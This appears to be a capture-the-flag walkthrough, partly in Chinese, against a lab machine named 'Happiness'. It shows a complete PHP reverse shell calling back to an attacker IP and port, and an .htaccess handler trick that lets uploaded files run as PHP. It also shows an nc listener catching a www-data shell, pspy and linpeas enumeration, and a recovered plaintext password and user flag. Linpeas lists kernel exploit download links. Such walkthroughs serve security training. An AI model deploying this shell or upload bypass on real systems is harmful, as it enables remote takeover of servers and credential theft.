        .logo { color: #2c3e50; font-size: 24px; font-weight: bold; margin-bottom: 10px; border-bottom: 2px solid #2c3e50; display: inline-block; padding: 0 10px; }
        .banner { font-size: 14px; color: #7f8c8d; margin-bottom: 25px; }
        input[type="file"] { margin: 20px 0; }
        input[type="submit"] { background: #2c3e50; color: white; border: none; padding: 10px 20px; border-radius: 4px; cursor: pointer; }
        .message { margin-top: 20px; font-size: 13px; color: #e74c3c; word-break: break-all; }
    </style>
	    </head>
	    <body>
	        <div class="container">
		        <div class="logo">MazeSec</div>
			        <div class="banner">安全、快速的临时文件中转中枢</div>
				        <form action="" method="post" enctype="multipart/form-data">
					            <input type="file" name="file" required><br>
						                <input type="submit" name="submit" value="开始上传">
								        </form>
									        <div class="message"></div>
										    </div>
										    </body>
</html>

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.0.108';
$port = 6666;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; bash -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?>

<FilesMatch "mac">
Sethandler application/x-httpd-php
</FilesMatch>

┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 6666                             
listening on [any] 6666 ...
connect to [192.168.0.108] from tmpfile.dsz [192.168.0.106] 53656
Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64 GNU/Linux
 01:51:31 up 24 min,  0 users,  load average: 0.24, 3.62, 9.51
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

提权-Eecho@Happiness

www-data@Happiness:/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2026/01/24 02:00:07 CMD: UID=33    PID=12259  | ./pspy64                                                        
2026/01/24 02:00:07 CMD: UID=33    PID=12226  | bash -i 
2026/01/24 02:00:07 CMD: UID=33    PID=12222  | sh -c uname -a; w; id; bash -i                                  
2026/01/24 02:00:07 CMD: UID=33    PID=685    | /usr/sbin/apache2 -k start                                                                        
2026/01/24 02:00:07 CMD: UID=0     PID=394    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal                           
2026/01/24 02:00:07 CMD: UID=0     PID=386    | /usr/sbin/vsftpd /etc/vsftpd.conf                               
2026/01/24 02:00:07 CMD: UID=0     PID=380    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups         
2026/01/24 02:00:07 CMD: UID=0     PID=367    | /sbin/agetty -o -p -- \u --noclear tty1 linux                   
2026/01/24 02:00:07 CMD: UID=0     PID=361    | /usr/sbin/inetutils-inetd                                       
2026/01/24 02:00:07 CMD: UID=0     PID=339    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                               
2026/01/24 02:00:07 CMD: UID=0     PID=336    | /lib/systemd/systemd-logind                                     
2026/01/24 02:00:07 CMD: UID=0     PID=323    | /usr/sbin/rsyslogd -n -iNONE                                    
2026/01/24 02:00:07 CMD: UID=104   PID=321    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

find / -writable -type d 2>/dev/null
/run/lock
/run/lock/apache2
/dev/mqueue
/dev/shm
/tmp
/proc/12500/task/12500/fd
/proc/12500/fd
/proc/12500/map_files
/var/www/html
/var/www/html/uploads
/var/www/localhost
/var/tmp
/var/lib/php/sessions
/var/cache/apache2/mod_cache_disk
www-data@Happiness:/opt$ cat Ee
cat Eecho_pass.txt 
Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

拿到凭据Eecho:2VQzte2RBr8p8MuOA0Gw2Sum

Eecho@Happiness:~$ cat user.txt 
flag{user-c2fdb0243cc742b18dcb4e5e68eed318}

提权-root

Eecho@Happiness:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for Eecho: 
Sorry, user Eecho may not run sudo on Happiness.

pspy

Eecho@Happiness:~$ wget http://192.168.0.108:8000/pspy64 -O pspy64
--2026-01-24 02:13:07--  http://192.168.0.108:8000/pspy64
Connecting to 192.168.0.108:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64        100%   2.96M  --.-KB/s    in 0.009s      

2026-01-24 02:13:07 (333 MB/s) - ‘pspy64’ saved [3104768/3104768]

Eecho@Happiness:~$ ls
pspy64  user.txt
Eecho@Happiness:~$ chmod 777 pspy64
Eecho@Happiness:~$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2026/01/24 02:13:47 CMD: UID=1000  PID=12538  | ./pspy64                                                        
2026/01/24 02:13:47 CMD: UID=1000  PID=12528  | -bash 
2026/01/24 02:13:47 CMD: UID=1000  PID=12527  | sshd: Eecho@pts/0                                               
2026/01/24 02:13:47 CMD: UID=1000  PID=12508  | (sd-pam)                                                        
2026/01/24 02:13:47 CMD: UID=1000  PID=12507  | /lib/systemd/systemd --user                                     
2026/01/24 02:13:47 CMD: UID=0     PID=12504  | sshd: Eecho [priv]                                              
2026/01/24 02:13:47 CMD: UID=33    PID=12442  | bash -i 
2026/01/24 02:13:47 CMD: UID=33    PID=12438  | sh -c uname -a; w; id; bash -i                                  
2026/01/24 02:13:47 CMD: UID=0     PID=12277  | 2026/01/24 02:13:47 CMD: UID=33    PID=12271  | bash -i 
2026/01/24 02:13:47 CMD: UID=33    PID=12266  | sh -c uname -a; w; id; bash -i                                  
2026/01/24 02:13:47 CMD: UID=33    PID=685    | /usr/sbin/apache2 -k start                                                                          
2026/01/24 02:13:47 CMD: UID=0     PID=394    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal                           
2026/01/24 02:13:47 CMD: UID=0     PID=386    | /usr/sbin/vsftpd /etc/vsftpd.conf                               
2026/01/24 02:13:47 CMD: UID=0     PID=380    | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups         
2026/01/24 02:13:47 CMD: UID=0     PID=367    | /sbin/agetty -o -p -- \u --noclear tty1 linux                   
2026/01/24 02:13:47 CMD: UID=0     PID=361    | /usr/sbin/inetutils-inetd                                       
2026/01/24 02:13:47 CMD: UID=0     PID=339    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                               
2026/01/24 02:13:47 CMD: UID=0     PID=336    | /lib/systemd/systemd-logind                                     
2026/01/24 02:13:47 CMD: UID=0     PID=323    | /usr/sbin/rsyslogd -n -iNONE                                    
2026/01/24 02:13:47 CMD: UID=104   PID=321    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                
2026/01/24 02:13:47 CMD: UID=0     PID=320    | /usr/sbin/cron -f                                               
2026/01/24 02:13:47 CMD: UID=101   PID=278    | /lib/systemd/systemd-timesyncd                                  
2026/01/24 02:13:47 CMD: UID=0     PID=249    | /lib/systemd/systemd-udevd                                      
2026/01/24 02:13:47 CMD: UID=0     PID=1      | /sbin/init                                                      
2026/01/24 02:14:34 CMD: UID=0     PID=12547  | sshd: [accepted]                                                
2026/01/24 02:14:34 CMD: UID=0     PID=12548  | sshd: [accepted]                                                
2026/01/24 02:14:41 CMD: UID=0     PID=12549  | sshd: Eecho [priv]                                              
2026/01/24 02:14:41 CMD: UID=0     PID=12550  | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new                       
2026/01/24 02:14:41 CMD: UID=0     PID=12551  | run-parts --lsbsysinit /etc/update-motd.d                       
2026/01/24 02:14:41 CMD: UID=0     PID=12552  | /bin/sh /etc/update-motd.d/10-uname                             
2026/01/24 02:14:41 CMD: UID=0     PID=12553  | run-parts --lsbsysinit /etc/update-motd.d                       
2026/01/24 02:15:12 CMD: UID=0     PID=12559  | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                               
2026/01/24 02:15:12 CMD: UID=0     PID=12560  | /bin/sh /sbin/dhclient-script

linpeas.sh

Eecho@Happiness:~$ ./linpeas.sh
                               
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                                                        
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html                                                      
 LEGEND:                                                
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting LinPEAS. Caching Writable Folders...
                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                             
                               ╚═══════════════════╝    
OS: Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
User & Groups: uid=1000(Eecho) gid=1000(Eecho) groups=1000(Eecho)
Hostname: Happiness
[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)           
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h) 
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE  
                     ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                              
                              ╚════════════════════╝    
╔══════════╣ Operative system
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits               
Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
Distributor ID: Debian
Description:    Debian GNU/Linux 10 (buster)
Release:        10
Codename:       buster

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version                  
Sudo version 1.9.5p2                                    
╔══════════╣ PATH
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses          
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
╔══════════╣ Date & uptime
Sat 24 Jan 2026 02:19:09 AM EST                         
 02:19:09 up 52 min,  2 users,  load average: 0.00, 0.00, 1.56
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices               
UUID=80e68759-1ca0-45eb-82a7-601b1f78dfe5 /               ext4    errors=remount-ro 0       1
UUID=257f425d-1ea4-4b8e-8dd8-69523f25d249 none            swap    sw              0       0
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                    
sda
sda1
sda2
sda5
╔══════════╣ Environment
╚ Any private information inside environment variables? 
USER=Eecho                                              
SSH_CLIENT=192.168.0.108 39356 22
SHLVL=1
HOME=/home/Eecho
SSH_TTY=/dev/pts/0
LOGNAME=Eecho
_=./linpeas.sh
TERM=xterm-256color
XDG_RUNTIME_DIR=/run/user/1000
LANG=en_US.UTF-8
SHELL=/bin/bash
PWD=/home/Eecho
SSH_CONNECTION=192.168.0.108 39356 192.168.0.106 22
╔══════════╣ Searching Signature verification failed in dmesg                                                   
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed                                                   
dmesg Not Found                                                                                         
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester      
[+] [CVE-2019-13272] PTRACE_TRACEME                     
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.
[+] [CVE-2021-4034] PwnKit
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found       
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found  
═╣ Seccomp enabled? ............... disabled            
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (oracle)        
╔══════════╣ Kernel Modules Information
══╣ Kernel modules with weak perms?                                                                       
══╣ Kernel modules loadable? 
Modules can be loaded                                   

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                             
                                   ╚═══════════╝        
╔══════════╣ Container related tools present (if any):
/usr/sbin/apparmor_parser                               
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot
/usr/sbin/capsh
/usr/sbin/setcap
/usr/sbin/getcap
╔══════════╣ Container details
═╣ Is this a container? ........... No                  
═╣ Any running containers? ........ No                  
                                                        
                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                             
                                     ╚═══════╝          
Learn and practice cloud hacking techniques in https://training.hacktricks.xyz                                                                                        
═╣ GCP Virtual Machine? ................. No
═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No
                ╔════════════════════════════════════════════════╗                                              
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                              
                ╚════════════════════════════════════════════════╝                                              
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes                             
root           1  0.0  0.4  98844 10204 ?        Ss   01:27   0:00 /sbin/init
root         225  0.0  0.7  48996 14788 ?        Ss   01:27   0:00 /lib/systemd/systemd-journald
root         249  0.0  0.2  22280  5776 ?        Ss   01:27   0:00 /lib/systemd/systemd-udevd
systemd+     278  0.0  0.3  89036  6208 ?        Ssl  01:27   0:00 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         320  0.0  0.1   6736  2700 ?        Ss   01:27   0:00 /usr/sbin/cron -f
message+     321  0.0  0.2   7836  4268 ?        Ss   01:27   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         323  0.0  0.2 222784  5796 ?        Ssl  01:27   0:00 /usr/sbin/rsyslogd -n -iNONE
root         336  0.0  0.3  22532  7400 ?        Ss   01:27   0:00 /lib/systemd/systemd-logind
root         339  0.0  0.2   9588  5672 ?        Ss   01:27   0:00 /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root         361  0.0  0.0   2500  1640 ?        S    01:27   0:00 /usr/sbin/inetutils-inetd
root         367  0.0  0.0   5840  1664 tty1     Ss+  01:27   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
Eecho      12527  0.0  0.2  14508  5688 ?        S    02:12   0:00  |   _ sshd: Eecho@pts/0
Eecho      12528  0.0  0.1   7084  3756 pts/0    Ss   02:12   0:00  |       _ -bash
Eecho      12580  0.0  0.1   3420  2536 pts/0    S+   02:19   0:00  |           _ /bin/sh ./linpeas.sh
Eecho      15655  0.0  0.0   3420  1032 pts/0    S+   02:22   0:00  |               _ /bin/sh ./linpeas.sh
Eecho      15659  0.0  0.1  11844  3364 pts/0    R+   02:22   0:00  |               |   _ ps fauxwww
Eecho      15658  0.0  0.0   3420  1032 pts/0    S+   02:22   0:00  |               _ /bin/sh ./linpeas.sh
Eecho      12554  0.0  0.2  14508  4704 ?        S    02:14   0:00      _ sshd: Eecho@pts/1
Eecho      12555  0.0  0.1   7084  3628 pts/1    Ss+  02:14   0:00          _ -bash
root         386  0.0  0.1   8556  3852 ?        Ss   01:27   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root         394  0.0  1.0 108880 21148 ?        Ssl  01:27   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root         427  0.0  1.7 253832 34820 ?        Ss   01:27   0:00 /usr/sbin/apache2 -k start
www-data     626  0.1  0.9 254164 18968 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     627  0.1  0.8 254164 16800 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     629  0.1  0.8 254020 16628 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     634  0.1  0.8 254020 16740 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data   12266  0.0  0.0   2472   568 ?        S    02:02   0:00  |   _ sh -c uname -a; w; id; bash -i
www-data   12271  0.0  0.1   3952  3176 ?        S    02:02   0:00  |       _ bash -i
www-data   12272  0.0  0.1   3428  2244 ?        S    02:02   0:00  |           _ grep -RIn --color=auto password|passwd|pwd|secret|token|apikey|api_key|key=|db_pass|db_user|mysql|redis|auth /
www-data     637  0.1  0.8 254156 16944 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     642  0.1  0.8 254020 17096 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     647  0.1  0.8 254156 16824 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     648  0.1  0.8 254028 16464 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     675  0.1  0.8 254156 16948 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
www-data     685  0.1  0.8 254020 16412 ?        S    01:35   0:03  _ /usr/sbin/apache2 -k start
Eecho      12507  0.0  0.4  15924  8888 ?        Ss   02:12   0:00 /lib/systemd/systemd --user
Eecho      12508  0.0  0.1  99760  2468 ?        S    02:12   0:00  _ (sd-pam)
╔══════════╣ Processes with unusual configurations
                                                        
╔══════════╣ Processes with credentials in memory (root req)                                                    
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory                                                       
gdm-password Not Found                                  
gnome-keyring-daemon Not Found                          
lightdm Not Found                                       
vsftpd process found (dump creds from memory as root)   
apache2 process found (dump creds from memory as root)
sshd: process found (dump creds from memory as root)
mysql process found (dump creds from memory as root)
postgres Not Found
redis-server Not Found                                  
mongod Not Found                                        
memcached Not Found                                     
elasticsearch Not Found                                 
jenkins Not Found                                       
tomcat Not Found                                        
nginx Not Found                                         
php-fpm Not Found                                       
supervisord Not Found                                   
vncserver Not Found                                     
xrdp Not Found                                          
teamviewer Not Found                                                                                       
╔══════════╣ Opened Files by processes
Process 12507 (Eecho) - /lib/systemd/systemd --user     
  └─ Has open files:
    └─ /proc/12507/mountinfo
    └─ /proc/swaps
    └─ /sys/fs/cgroup/user.slice/user-1000.slice/user@1000.service
Process 12528 (Eecho) - -bash 
  └─ Has open files:
    └─ /dev/pts/0
Process 12555 (Eecho) - -bash 
  └─ Has open files:
    └─ /dev/pts/1
╔══════════╣ Processes with memory-mapped credential files                                                                                                            
╔══════════╣ Processes whose PPID belongs to a different user (not root)                                        
╚ You will know if a user can somehow spawn processes as a different user                                                                                            
╔══════════╣ Files opened by processes belonging to other users                                                 
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                    
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs            
══╣ Cron jobs list                                      
/usr/bin/crontab                                        
incrontab Not Found
-rw-r--r-- 1 root root    1042 Oct 11  2019 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
-rw-r--r--  1 root root  712 Mar  9  2025 php
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
/etc/cron.daily:
total 36
drwxr-xr-x  2 root root 4096 Apr  1  2025 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
-rwxr-xr-x  1 root root  539 Jul  1  2024 apache2
-rwxr-xr-x  1 root root 1478 Apr 19  2021 apt-compat
-rwxr-xr-x  1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x  1 root root 1187 May 24  2022 dpkg
-rwxr-xr-x  1 root root  377 Aug 28  2018 logrotate
-rwxr-xr-x  1 root root  249 Sep 27  2017 passwd
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
/etc/cron.weekly:
total 12
drwxr-xr-x  2 root root 4096 Mar 18  2025 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
-rw-r--r--  1 root root  102 Oct 11  2019 .placeholder
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
══╣ Checking for specific cron jobs vulnerabilities
Checking cron directories...                            

╔══════════╣ System timers
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers                        
══╣ Active timers:                                      
NEXT                        LEFT          LAST                        PASSED        UNIT                         ACTIVATES
Sat 2026-01-24 02:39:00 EST 16min left    Sat 2026-01-24 02:09:43 EST 12min ago     phpsessionclean.timer        phpsessionclean.service
Sat 2026-01-24 06:54:10 EST 4h 31min left Sat 2026-01-24 02:07:53 EST 14min ago     apt-daily-upgrade.timer      apt-daily-upgrade.service
Sat 2026-01-24 08:00:10 EST 5h 37min left Thu 2026-01-22 12:17:33 EST 1 day 14h ago apt-daily.timer              apt-daily.service
Sun 2026-01-25 00:00:00 EST 21h left      Sat 2026-01-24 01:26:56 EST 55min ago     logrotate.timer              logrotate.service
Sun 2026-01-25 01:42:43 EST 23h left      Sat 2026-01-24 01:42:43 EST 39min ago     systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
══╣ Disabled timers:
══╣ Additional timer files:                             
                                                      
╔══════════╣ Services and Service Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services                      
                                                        
══╣ Active services:
apache2.service                    loaded active running The Apache HTTP Server
./linpeas.sh: 3944: local: /usr/sbin/apachectl: bad variable name
 Not Found                                                   
══╣ Disabled services:
